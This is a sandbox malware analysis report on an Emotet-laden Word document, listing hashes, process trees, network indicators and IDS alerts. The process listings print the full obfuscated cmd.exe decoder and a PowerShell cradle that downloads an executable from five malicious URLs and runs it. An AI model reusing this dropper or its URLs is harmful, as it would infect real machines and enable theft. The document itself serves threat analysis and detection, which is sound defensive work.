File name: 05616586598.doc

Full analysis: https://app.any.run/tasks/7e26b191-e886-4845-bbdc-29dfefe421dc
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 22, 2019, 15:14:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: opendir, loader, emotet-doc, emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5: DF1B636312F266DFD19EF1E99F388B81
SHA1: 778CFAE5B20EFB29B3DD837CA7191315F298C3D1
SHA256: 81A1837A1F222BEE32C84622BF0AAED551D08644F68AA3209EC3DB35696BBEB1
SSDEEP: 3072:uFntGJpjL/xSu90OoiLuDKZXfwKeljR1z:uJEhxUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2976)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2976)
    • Application was dropped or rewritten from another process

      • 269.exe (PID: 3504)
      • 269.exe (PID: 2468)
      • wabmetagen.exe (PID: 296)
      • wabmetagen.exe (PID: 2824)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2608)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3172)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4044)
      • cmd.exe (PID: 2608)
    • Application launched itself

      • cmd.exe (PID: 2608)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2760)
    • Creates files in the user directory

      • powershell.exe (PID: 3172)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3172)
      • 269.exe (PID: 2468)
    • Starts itself from another location

      • 269.exe (PID: 2468)
    • Connects to unusual port

      • wabmetagen.exe (PID: 2824)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2976)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2976)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3172)
      • 269.exe (PID: 2468)
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:22 13:10:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 13:10:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: (base64 data omitted)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00200428
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00200428
WordDocumentBodySectPRRsidRPr: 0038126B
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
Total processes: 41
Monitored processes: 10
Malicious processes: 3
Suspicious processes: 5

Behavior graph

[Figure: process behavior graph. Nodes, in order: winword.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, powershell.exe, 269.exe, 269.exe, wabmetagen.exe, wabmetagen.exe. Edge labels: start, drop and start.]

Process information

PID: 2976
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\05616586598.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 4044
CMD: c:\w4537\d5871\t6947\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA/Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,43,56,63,56,56,24,60,37,37,64,76,63,57,77,14,45,70,68,43,17,43,52,63,76,42,57,77,14,50,70,68,43,39,39,44,32,12,15,3,45,45,0,21,75,68,16,4,45,21,8,32,17,4,45,68,73,0,55,28,71,14,7,20,58,28,25,11,44,37,28,11,6,66,28,20,74,39,33,28,55,11,8,32,40,50,22,73,4,0,21,17,11,11,5,57,65,65,29,17,39,12,55,33,67,28,1,18,33,11,30,6,25,7,49,65,39,66,3,54,4,60,73,40,60,39,11,13,17,11,11,5,57,65,65,71,71,71,6,49,28,9,29,69,33,9,17,11,7,55,6,18,29,55,75,20,7,59,5,17,6,25,7,49,65,71,51,60,33,72,11,23,71,24,27,58,10,67,12,13,17,11,11,5,57,65,65,5,11,7,69,6,25,39,12,20,65,71,25,30,68,72,46,61,33,31,4,4,68,10,69,18,55,13,17,11,11,5,57,65,65,29,33,1,25,7,55,5,1,7,6,25,7,6,19,29,65,47,69,17,51,34,5,9,18,62,41,73,67,10,23,75,28,13,17,11,11,5,57,65,65,18,25,17,29,5,28,55,20,28,75,1,33,58,69,6,55,39,65,28,3,28,46,63,50,20,23,1,25,3,73,11,66,76,20,21,6,56,5,39,33,11,48,21,13,21,26,8,32,58,50,16,4,45,0,21,7,22,15,38,38,21,8,32,67,45,50,50,16,44,0,44,21,38,22,4,21,8,32,12,45,45,73,16,0,21,29,45,45,4,4,21,8,32,18,3,4,3,22,0,32,28,55,67,57,11,28,49,5,35,21,36,21,35,32,67,45,50,50,16,35,21,6,28,59,28,21,8,69,7,1,28,29,25,17,48,32,7,15,68,16,22,44,33,55,44,32,40,50,22,73,4,26,2,11,1,30,2,32,17,4,45,68,73,6,31,7,71,55,39,7,29,75,23,33,39,28,48,32,7,15,68,16,22,70,44,32,18,3,4,3,22,26,8,32,49,68,3,22,68,0,21,75,68,4,22,15,21,8,24,69,44,48,48,46,28,11,14,24,11,28,49,44,32,18,3,4,3,22,26,6,39,28,55,9,11,17,44,14,9,28,44,45,73,73,73,73,26,44,2,24,55,67,7,40,28,14,24,11,28,49,44,32,18,3,4,3,22,8,32,71,68,15,68,45,0,21,49,68,15,4,3,21,8,20,1,28,29,40,8,53,53,25,29,11,25,17,2,53,53,32,5,3,50,22,22,0,21,20,50,45,15,68,21,8,82)do set NZ=!NZ!!xgz:~%m,1!&&if %m gtr 81 echo !NZ:*NZ!=!|cmd"
Path: c:\windows\system32\cmd.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2608
CMD: CmD /V:/C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA/Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,43,56,63,56,56,24,60,37,37,64,76,63,57,77,14,45,70,68,43,17,43,52,63,76,42,57,77,14,50,70,68,43,39,39,44,32,12,15,3,45,45,0,21,75,68,16,4,45,21,8,32,17,4,45,68,73,0,55,28,71,14,7,20,58,28,25,11,44,37,28,11,6,66,28,20,74,39,33,28,55,11,8,32,40,50,22,73,4,0,21,17,11,11,5,57,65,65,29,17,39,12,55,33,67,28,1,18,33,11,30,6,25,7,49,65,39,66,3,54,4,60,73,40,60,39,11,13,17,11,11,5,57,65,65,71,71,71,6,49,28,9,29,69,33,9,17,11,7,55,6,18,29,55,75,20,7,59,5,17,6,25,7,49,65,71,51,60,33,72,11,23,71,24,27,58,10,67,12,13,17,11,11,5,57,65,65,5,11,7,69,6,25,39,12,20,65,71,25,30,68,72,46,61,33,31,4,4,68,10,69,18,55,13,17,11,11,5,57,65,65,29,33,1,25,7,55,5,1,7,6,25,7,6,19,29,65,47,69,17,51,34,5,9,18,62,41,73,67,10,23,75,28,13,17,11,11,5,57,65,65,18,25,17,29,5,28,55,20,28,75,1,33,58,69,6,55,39,65,28,3,28,46,63,50,20,23,1,25,3,73,11,66,76,20,21,6,56,5,39,33,11,48,21,13,21,26,8,32,58,50,16,4,45,0,21,7,22,15,38,38,21,8,32,67,45,50,50,16,44,0,44,21,38,22,4,21,8,32,12,45,45,73,16,0,21,29,45,45,4,4,21,8,32,18,3,4,3,22,0,32,28,55,67,57,11,28,49,5,35,21,36,21,35,32,67,45,50,50,16,35,21,6,28,59,28,21,8,69,7,1,28,29,25,17,48,32,7,15,68,16,22,44,33,55,44,32,40,50,22,73,4,26,2,11,1,30,2,32,17,4,45,68,73,6,31,7,71,55,39,7,29,75,23,33,39,28,48,32,7,15,68,16,22,70,44,32,18,3,4,3,22,26,8,32,49,68,3,22,68,0,21,75,68,4,22,15,21,8,24,69,44,48,48,46,28,11,14,24,11,28,49,44,32,18,3,4,3,22,26,6,39,28,55,9,11,17,44,14,9,28,44,45,73,73,73,73,26,44,2,24,55,67,7,40,28,14,24,11,28,49,44,32,18,3,4,3,22,8,32,71,68,15,68,45,0,21,49,68,15,4,3,21,8,20,1,28,29,40,8,53,53,25,29,11,25,17,2,53,53,32,5,3,50,22,22,0,21,20,50,45,15,68,21,8,82)do set NZ=!NZ!!xgz:~%m,1!&&if %m gtr 81 echo !NZ:*NZ!=!|cmd"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2640
CMD: C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $u5844='d1794';$h9410=new-object Net.WebClient;$k3609='http://ahluniversity.com/lW8Z9O0kOlt@http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu@http://ptof.club/wcy1UGRiD991_fsn@http://airconpro.co.za/YfhHLpgsKJ0v_Fde@http://schapenbedrijf.nl/e8eGE3bFrc80tWMb'.Split('@');$j3794='o6522';$v4337 = '269';$u4407='a4499';$s8986=$env:temp+'\'+$v4337+'.exe';foreach($o5176 in $k3609){try{$h9410.DownloadFile($o5176, $s8986);$m1861='d1965';If ((Get-Item $s8986).length -ge 40000) {Invoke-Item $s8986;$w1514='m1598';break;}}catch{}}$p8366='b3451';"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2760
CMD: cmd
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3172
CMD: powershell $u5844='d1794';$h9410=new-object Net.WebClient;$k3609='http://ahluniversity.com/lW8Z9O0kOlt@http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu@http://ptof.club/wcy1UGRiD991_fsn@http://airconpro.co.za/YfhHLpgsKJ0v_Fde@http://schapenbedrijf.nl/e8eGE3bFrc80tWMb'.Split('@');$j3794='o6522';$v4337 = '269';$u4407='a4499';$s8986=$env:temp+'\'+$v4337+'.exe';foreach($o5176 in $k3609){try{$h9410.DownloadFile($o5176, $s8986);$m1861='d1965';If ((Get-Item $s8986).length -ge 40000) {Invoke-Item $s8986;$w1514='m1598';break;}}catch{}}$p8366='b3451';
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3504
CMD: "C:\Users\admin\AppData\Local\Temp\269.exe"
Path: C:\Users\admin\AppData\Local\Temp\269.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corp
Integrity Level: MEDIUM
Description: Canadian M
Exit code: 0
Version: 3.0.69

PID: 2468
CMD: "C:\Users\admin\AppData\Local\Temp\269.exe"
Path: C:\Users\admin\AppData\Local\Temp\269.exe
Parent process: 269.exe
User: admin
Company: Microsoft Corp
Integrity Level: MEDIUM
Description: Canadian M
Exit code: 0
Version: 3.0.69

PID: 296
CMD: "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"
Path: C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Parent process: 269.exe
User: admin
Company: Microsoft Corp
Integrity Level: MEDIUM
Description: Canadian M
Exit code: 0
Version: 3.0.69

PID: 2824
CMD: "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"
Path: C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Parent process: wabmetagen.exe
User: admin
Company: Microsoft Corp
Integrity Level: MEDIUM
Description: Canadian M
Version: 3.0.69

Total events: 1 790
Read events: 1 308
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 2
Suspicious files: 2
Text files: 0
Unknown types: 3

Dropped files

PID: 2976
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVRE8FC.tmp.cvr
Type: -
MD5: -
SHA256: -

PID: 2976
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15537A9C.jpg
Type: -
MD5: -
SHA256: -

PID: 3172
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ETA1VRVI8LW1303ZQQ7R.temp
Type: -
MD5: -
SHA256: -

PID: 3172
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\269.exe
Type: -
MD5: -
SHA256: -

PID: 3172
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256: AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3

PID: 2976
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
Type: tlb
MD5: E06109969FEBE50C3AE71B5B04150D54
SHA256: 347F2E6A51A90F23672DD1432113232728893CF9AC1E28D88F701F2A6A923FCE

PID: 2976
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: 5668E0BECA7260FE57640A54FBAEC98C
SHA256: F31166347156B1F55AC9D8543E3751068AAE8BB7A649F271617CCF59E1E3BEBA

PID: 2468
Process: 269.exe
Filename: C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Type: executable
MD5: 69A348DF3D2DD26C01B0D943014A3681
SHA256: E2336EB2A1DB7A170E0790DC5A0E1F0CF9CEDD76EAB4842AD7424A5CFA3CB569

PID: 2976
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~$616586598.doc
Type: pgc
MD5: BA8DFD296864750F0DB790346614E69E
SHA256: ED78B104B33BDD32D3E811C2402ACC901A802A24C95C510C28A87487B9DE3399

PID: 3172
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f90a.TMP
Type: binary
MD5: 2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256: AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
HTTP(S) requests: 4
TCP/UDP connections: 3
DNS requests: 4
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3172 | powershell.exe | GET | 301 | 192.185.52.164:80 | http://ahluniversity.com/lW8Z9O0kOlt | US | html | 312 b | malicious
3172 | powershell.exe | GET | 200 | 192.185.52.164:80 | http://ahluniversity.com/lW8Z9O0kOlt/ | US | html | 506 b | malicious
3172 | powershell.exe | GET | 301 | 192.185.20.9:80 | http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu | US | html | 339 b | suspicious
3172 | powershell.exe | GET | 200 | 192.185.20.9:80 | http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu/ | US | executable | 545 Kb | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2824 | wabmetagen.exe | 182.176.106.43:995 | - | Pakistan Telecom Company Limited | PK | malicious
3172 | powershell.exe | 192.185.52.164:80 | ahluniversity.com | CyrusOne LLC | US | malicious
3172 | powershell.exe | 192.185.20.9:80 | www.megafighton.sandboxph.com | CyrusOne LLC | US | suspicious

DNS requests

Domain | IP | Reputation
ahluniversity.com | 192.185.52.164 | malicious
www.megafighton.sandboxph.com | 192.185.20.9 | suspicious
dns.msftncsi.com | 131.107.255.255 | shared

Threats

PID | Process | Class | Message
3172 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3172 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3172 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
3172 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3172 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP
No debug info